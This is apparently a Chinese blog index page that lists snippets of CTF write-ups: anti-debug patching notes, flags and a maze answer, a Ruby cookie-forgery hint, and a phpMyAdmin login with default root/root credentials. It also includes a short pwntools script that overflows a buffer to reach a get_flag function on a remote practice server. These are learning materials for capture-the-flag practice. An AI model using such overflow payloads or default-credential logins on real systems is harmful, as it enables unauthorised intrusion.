bmzctf刷题 SCTF 2018_Simple PHP Web ...
分类:
Web程序 时间:
2021-06-18 19:12:05
阅读次数:
0
[MRCTF2020]Shit 有三处反调,一处在1640主函数中,一处在1270,直接patch就行 还有一处不会给提示,但是不断循环,跳过方式为在获取输入函数后下个断点,运行程序后attach上(断点设在加密函数处断不下来,不知为啥) 判断函数在 1460中会对一些用到的数据进行修改,所以必须动 ...
分类:
其他好文 时间:
2020-08-27 17:03:12
阅读次数:
57
T0p Gear 三个check 第一个是直接比较:c92bb6a5 第二个是解密文件:a6c30091 第三个是解密数据:24566d882d4bc7ee 拼起来就是flag easy_maze 迷宫题,uhjk控制方向 jkkjjhjjkjjkkkuukukkuuhhhuukkkk md5加个密 ...
分类:
其他好文 时间:
2020-06-27 00:17:27
阅读次数:
364
在做buu题目的时候,发现在最上面有几道被各位师傅打到1分的题,强迫症逼迫我去做那几道题。 这里来试着去解决这些题。。。讲真的,我感觉自己刷题真的少,即使是很简单的栈题目,我还是能学习到新的东西。这里就记录一下这几道题。 pwn1_sctf_2016 检查了一下保护,32位程序,只开启了堆栈不可执行 ...
分类:
其他好文 时间:
2020-04-07 20:42:14
阅读次数:
178
[SCTF2019]Flag Shop 将回日月先反掌;欲作江河惟画地 考点: ruby审计 cookie伪造; 记录一道SCTF的题目,读取robots.txt 发现/filebak 进行读取。是ruby; 抓包进行测试,发现每一次工作之后cookie都会发生改变,结合源码,发现cookie加密方 ...
分类:
其他好文 时间:
2020-04-03 12:25:59
阅读次数:
138
from pwn import * sh=remote('pwn.buuoj.cn',20086) get_flag=0x08048F0D payload='I'*0x14+'a'*4+p32(get_flag) sh.sendline(payload) sh.interactive() ...
分类:
其他好文 时间:
2019-12-23 15:06:47
阅读次数:
316
7. 又一张图片,还单纯吗 题目地址:https://ctf.bugku.com/challenges 参考:https://blog.csdn.net/qq_34072526/article/details/87429029 binwalk打开 使用foremost要把output文件夹清空 fo ...
分类:
其他好文 时间:
2019-07-24 21:04:20
阅读次数:
150
参加了个sctf比赛,也写一个WP,对就是一个。因为只做出了一个题目。。。。,而且还是最简单的modbus协议的题目。作为一个刚刚出生的ctf小朋友,也非常值得欣慰的。。。不管做出了多少,总结是必要的,并且还要了解的透彻。1、首先打开题目,下载到了一个数据包。使用wireshark打开。里面存放了很多数据。看到题目首先百度一波modbus,原来这是一个工业协议。来波这个协议的定义:Modbus协议
分类:
数据库 时间:
2018-06-24 13:04:09
阅读次数:
734
6月19日的SCTF的web送分题。 打开链接是一个phpmyadmin的登陆界面,尝试用默认账号:root 密码:root登陆 于是直接进去了,首先看下数据库,除了些初始化的库以外,abc这个库比较在意。 查看一下里面的内容。 这个库估计是各个师傅们在做这个题的时候为了getshell创建的。 很 ...
分类:
Web程序 时间:
2018-06-22 01:04:21
阅读次数:
340
这是捕获的黑客攻击数据包,LateRain用户的密码在此次攻击中泄露了,你能找到吗? FLAG格式:SCTF{LateRain的明文密码} LINK: http://pan.baidu.com/s/1jH9bkLw 文件名:sctf-Misc400a.pcap 打开数据包,发现数据量很多。直接sta ...
分类:
其他好文 时间:
2017-10-16 18:01:59
阅读次数:
369
